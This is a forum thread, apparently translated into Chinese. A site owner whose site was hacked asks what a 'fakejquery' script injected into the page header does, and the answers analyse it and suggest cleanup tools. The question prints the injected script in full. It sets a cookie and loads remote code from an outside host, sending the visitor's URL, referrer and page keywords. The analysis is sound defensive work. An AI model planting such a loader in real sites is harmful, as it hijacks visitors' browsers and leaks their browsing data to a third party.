Home / Questions / 28370
Accepted
Juan Pinzón
Asked: 2020-10-18 13:59:49 +0800 CST 2020-10-18 13:59:49 +0800 CST

使用引用另一个网站的脚本的网站破解

  • 772

最近我的网站被黑了,攻击者设法将 webshel​​l 上传到该网站,但一切都已被控制,该网站再次安全。

现在eset nod32为我检测到了一个木马fakejquery,调查了一下我可以看到以下脚本已经插入到页面的标题中:

<script>
    var a = '';
    setTimeout(1);

    function setCookie(a, b, c) {
        var d = new Date;
        d.setTime(d.getTime() + 60 * c * 60 * 1e3);
        var e = "expires=" + d.toUTCString();
        document.cookie = a + "=" + b + "; " + e
    }

    function getCookie(a) {
        for (var b = a + "=", c = document.cookie.split(";"), d = 0; d < c
            .length; d++) {
            for (var e = c[d];
                " " == e.charAt(0);) e = e.substring(1);
            if (0 == e.indexOf(b)) return e.substring(b.length, e.length)
        }
        return null
    }
    null == getCookie("__cfgoid") && (setCookie("__cfgoid", 1, 1), 1 ==
        getCookie("__cfgoid") && (setCookie("__cfgoid", 2, 1), document.write(
            '<script type="text/javascript" src="' +
            'http://crazytime.home.pl/js/jquery.min.php' + '?key=b64' +
            '&utm_campaign=' + 'I92930' + '&utm_source=' + window.location.host +
            '&utm_medium=' + '&utm_content=' + window.location +
            '&utm_term=' + encodeURIComponent(
                ((k = (function() {
                        var keywords = '';
                        var metas = document.getElementsByTagName('meta');
                        if (metas) {
                            for (var x = 0, y = metas.length; x < y; x++) {
                                if (metas[x].name.toLowerCase() == "keywords") {
                                    keywords += metas[x].content;
                                }
                            }
                        }
                        return keywords !== '' ? keywords : null;
                    })()) == null ? (v = window.location.search.match(
                        /utm_term=([^&]+)/)) == null ? (t = document.title) == null ?
                    '' : t : v[1] : k)) + '&se_referrer=' + encodeURIComponent(
                document.referrer) + '"><' + '/script>')));
</script>

据我了解,上述脚本正在为外部站点生成流量。

我已经从网站上删除了所有这些代码,但我想知道这段代码实际上做了什么。

我的问题是:我认为流量正在生成到外部站点是否正确,或者上面共享的代码是否做了额外的事情?

javascript

3 Answers

  1. Best Answer

    您一直是黑帽 SEO的受害者,我认为更具体地说是垃圾邮件关键字技术,该技术包括用垃圾邮件内容的关键字填充网站的内容。这也称为关键字填充垃圾索引

    所有这些技术旨在改变网站在搜索引擎中的排名,这是一把双刃剑,因为搜索引擎拥有检测此类垃圾邮件的工具,因此可以将您的页面从排名中删除。

    许多搜索引擎会检查垃圾邮件索引并从其索引中删除可疑页面。

    这部分

    document.write('<script type="text/javascript" src="' +

     /**** Esta es la url a donde va el tráfico ***/

     'http://crazytime.home.pl/js/jquery.min.php' + 

     '?key=b64' + '&utm_campaign=' + 'I92930' + '&utm_source=' +
      window.location.host + '&utm_medium=' + '&utm_content=' + 
      window.location + '&utm_term=' ..........

    您正在创建一个将尝试加载外部页面的脚本,并且您正在使用关键字甚至您自己页面的标题将它们作为查询中的参数传递

    这个片段证明了这一点。

    var k = (function() {
  var keywords = '';
  var metas = document.getElementsByTagName('meta');
  if (metas) {
    for (var x = 0, y = metas.length; x < y; x++) {
      if (metas[x].name.toLowerCase() == "keywords") {
        keywords += metas[x].content;
      }
    }
  }
  return keywords !== '' ? keywords : null;
})();

console.log(k);
    <!DOCTYPE html>
<html>

<head>
  <meta name="keywords" content="hello world">
  <meta name="keywords" content="hola mundo">
</head>

<body>

</body>

</html>

    它还在阅读您页面的引荐来源网址并正在发送它

    '&se_referrer=' + encodeURIComponent(document.referrer);

    最后也是最重要的一点,您将 cookie("__cfgoid") 保存在使用您网站的用户的浏览器中。 

    function setCookie(a, b, c) {
  var d = new Date;
  d.setTime(d.getTime() + 60 * c * 60 * 1e3);
  var e = "expires=" + d.toUTCString();
  document.cookie = a + "=" + b + "; " + e
}

    我建议,既然您已经控制了威胁,那么您可以编写其他脚本来清理所述 cookie。

    • 65

  2. 使用这个: http: //virustotal.com它将帮助您扫描您认为是恶意软件或不安全的东西的恶意文件和 URL。

    有趣的是,这个 URL 已经被解析过了,一开始它给了我:

    网址已分析

    VirusTotal 于 2016 年 1 月 1 日 07:12:28 UTC 上次分析此 URL,VirusTotal 于 2016 年 1 月 1 日 07:12:28 UTC 首次分析此 URL。

    检测率:0/66

    您可以看一下上次的分析或现在再次分析。

    但是再次解析时:

    URL:    http://crazytime.home.pl/js/jquery.min.php
Detection ratio:    1 / 68
Analysis date:  2016-10-17 22:27:58 UTC ( 0 minutes ago )
File scan:  Go to downloaded file analysis

    结果:

    https://virustotal.com/en/url/50464e88f0c2600be82edb631148a37660856f4ddae633de110dc3d6fdc43266/analysis/1476743278/

    现在,另一方面,在 public_html 中可以方便地使用此实用程序:https ://github.com/emposha/PHP-Shell-Detector

    • 20

  3. 您遭受的攻击是他们上传了一个 PHP 文件并将您的网站流量发送给广告第三方或其他人,我建议您检查服务器上文件夹的所有权限以验证任何文件夹是否具有写入服务,即他们正在那里上传文件,然后他们从那里进行攻击,我曾经发生过一次关于在没有程序的情况下入侵 facebook的情况 ,我不得不检查我服务器的所有权限。如果我在权限方面遇到问题,这就是我告诉你从那里开始的原因。

    • 3